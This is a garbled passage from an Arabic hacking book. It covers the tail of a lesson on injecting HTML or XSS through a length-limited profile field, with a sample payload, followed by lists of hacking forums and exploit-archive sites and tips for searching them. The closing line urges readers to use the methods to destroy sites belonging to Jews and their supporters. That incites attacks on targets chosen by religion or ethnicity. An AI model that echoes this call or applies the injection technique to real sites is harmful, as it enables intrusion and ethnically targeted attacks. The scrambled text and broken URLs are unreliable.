.‬اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب‬ ‫ن يبدأ بالعلمه ‪:‬‬ ‫"<‬ ‫و ممكن ينتهي بالعلمه‬ ‫>‪b‬‬ ‫حتى ل تجد اي مشاكل في الكود عند العرض ‪.‬‬ ‫خلي بالك ان فيه مسافه بعد العلمه‬ ‫">‪b‬‬ ‫خلي بالك منها وال سوف تجد بروكين كود ‪...‬‬ ‫انتهى‪،،،‬‬ ‫‪326‬‬ .....‬‬ ‫اقصى حد للكود اللي ممكن انك تشغله هو ‪ 30‬كراكتر ‪.‬‬ ‫اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات ‪ xss‬او اي حاجه انت مش عارف تنفذها بسبب اغلق كود‬ ‫الهتمل اياه =( لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟‬ ‫الحل ‪:‬‬ ‫لسه و ال !!!!‬ ‫و السلم عليكم و رحمه ال و بركاته‪..‫>!‪<!-....‬و كده الكود تم تشغيله !!!!‬ ‫مثال للي ممكن تكتبه مثل ‪:‬‬ ‫"<>‪h1>TESTING</h1><b‬‬ ‫طبعا ده حيطبع الكلمه ‪ TESTING‬مكان صورتك الشخصيه ‪!!..‬ضع بعد كده اسم اليوزر و رقم الي دي و بعدين ‪submit‬‬ ‫سوف تجد نفسك في صفحه ‪ Your Account‬الخاصه بك ‪.END CODE --‬‬ ‫و الن عليك تشغيل ملف ال ‪ html‬هذا ‪ ..

‫منتدى ابن مصر‬ /http://www.org/forum/index.6 .net/vb .php .arabse." ‫" أفضل المنتديات العربية للهاكر‬ :::‫أقد لكم أفضل المواقع والمنتديات العربية في مجال الهاك بجميع مجالته على حد معرفتي‬ /http://members.php .‫منتدى نجم دوس‬ 327 .‫منتدى شبكة الحزم السلمية‬ http://www.net ‫موقع‬ /http://www.10 .com/vb .‫منتدى شبكة المهندس‬ /http://www.com .2 .ebnmasr.8 .‫منتدى هاكر فلسطين‬ /http://www.5 .net/vb .uk/hihack/vb .‫منتدى منظمة هاي هكر‬ /http://www.7azm.ruwad.‫منتدى امبراطورية العرب‬ /http://www.co.‫منتدى رواد‬ /http://www.3 .9 .12 .‫منتدى معتز نت‬ /http://www.org .nafitha.tk .com/vb/forumdisplay.‫منتدى إعصار‬ /http://www.7 .e3sar.lycos.11 .1 .13 .almuhands.pharaonics.php .h4palestine.arab4vb.com/vb/index.‫موقع المد الحمر‬ http://www.4 .‫منتدى عرب فيجوال بيسك‬ http://www.emoataz.net/vb .naajm.net/vb .

‬‬ ‫" أفضل مواقع المن والهاك النجليزية "‬ ‫هذه بعض المواقع المهمة التي يستخدمها الهكر لمعرفة اخر الثغرات الصادره مع مقالت بسيط لهذه المواقع‬ ‫موقع ‪Packet Storm Security‬‬ ‫‪---------------------‬‬‫العنوان ‪/http://packetstorm..)/Kroll-O-Nagra ) http://www.com‬‬ ‫موقع ‪Security Focus‬‬ ‫‪---------------‬‬‫العنوان ‪/http://www.com :‬‬ ‫واحد من اكبر قواعد البيانات التي تحمل كعلومات متعلقة بالمن‬ ‫انا افضل الذهاب الى هذا الموقع مره في اليوم لقراءة قسم '‪ 'New Files Today‬سواءا للبحث عن‬ ‫ثغرات معينه او ل‪.securify.com :‬‬ ‫‪328‬‬ .‫هذه افضل مارأيته وتصفحته عن المواقع العربية التي تدعم علم الهاك‪.‬‬ ‫وشكرااا‪.securityfocus.‬‬ ‫اوجد الرشيف عن طريق ‪ Ken Williams‬حيث ان هذا الموقع يستهلك مئات اللوف من النقرات كل‬ ‫اسبوع‬ ‫حاليا انتقلت ملكيته الى مالك ‪..securify.

com‬وسابقا‬ ‫كان مستضيفة )‪.com/books/index.com‬‬ ‫تستطيع ايضا البحث في ارشيفاتها التي تعتبر لدي من افضل قواعد البيانات وذلك عن طريق دخول الموقع ثم‬ ‫البحث عن رابط '‪'search‬‬ ‫البحث ‪Searching‬‬ ‫‪-----------‬‬‫اذا كنت تريد البحث عن ثغرة متعلقة بخدمه معينة مثل ‪ Sendmail 8.sk‬‬ ‫‪.‫قاعدة بيانات اخرى كاملة ‪ .securityfocus.2‬‬ ‫موقع ‪http://www.‬‬ ‫وهذه بعض المواقع الخرى‪:::‬‬ ‫موقع ‪/http://rootshell.za‬‬ ‫‪.t0010.3‬واذا اردت البحث عن ثغره معينه مثل هجوم حجب الخدمه ‪ local DoS‬ضد اي‬ ‫نسخه من ‪sendmail‬‬ ‫فما عليك ال كتابت التالي ‪ 'local DoS sendmail' :‬بدون علمات القتباس‪.redi.1‬‬ ‫موقع ‪/http://www.com‬‬ ‫‪.org‬‬ ‫‪ BugTraq‬واحدة من افضل قائمة المراسلت البريدية ‪ mailing list‬التي تتهتم بالمن اللكتروني‬ ‫هذه القائمة يقوم عليها رئيس اسمه ‪ .ussrback.4‬‬ ‫تقبلوا تحياتي‪،،،‬‬ ‫انتهى‪،،،‬‬ ‫تم تحميل الكتاب من مكتبة الطارق اللكترونية‬ ‫‪http://www.org/sploits.2‬‬ ‫موقع ‪http://blacksun.org‬يستقبل الرسائل‬ ‫التي ترسلها ) عن ثغرة معينه مثل ( ويقوم بتحليلها وتنضيفها من ال ‪ spams‬والرسائل التي ليس لها‬ ‫فائدة او الثغرات القديمة ثم يقوم بإرسال الرساله الممتازه فقط الى جميع المشتركين في القائمة‬ ‫انصحك بالتسجيل ‪/http://www.haker.securityfocus.com.3‬فستحتاج لكتابت '‬ ‫‪ 'sendmail 8.4‬‬ ‫=‪=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+‬‬ ‫أما بالنسبة لمواقع الهاك النجليزية فمعرفتي بها ضئيلة لعدم توسعي في اللغة النجليزية‪ ،‬وهذه المواقع‬ ‫كالتالي‪:::‬‬ ‫موقع ‪http://www.box. /Security Focus )http://www.insecure.netspace.3‬‬ ‫موقع ‪http://www.com.com‬‬ ‫‪.html‬‬ ‫‪.blackcode.com‬‬ ‫‪.php‬‬ ‫‪329‬‬ .(/Netspace ) http://www.8.co.8.‬تتحدث يوميا فهؤلء الشباب القائمون على هذا الموقع ل ينامون ابدا !‬ ‫‪BugTraq‬‬ ‫‪-------‬‬‫العنوان ‪ :‬مستضيفه موقع ‪ ).(Aleph1 (aleph1@underground.tk‬‬ ‫‪.1‬‬ ‫موقع ‪http://www.webattack.pl‬‬ ‫‪.3‬‬ ‫موقع ‪http://www.linux.cn/hack.

‫الرجاء عدم التجربة على المواقع العربية النافعه والستفاده‬ ‫من المعلومات للقضاء على المواقع الباحية والتابعة لليهود‬ ‫واعوانهم‬ ‫الخاتمة‬ ‫‪330‬‬ .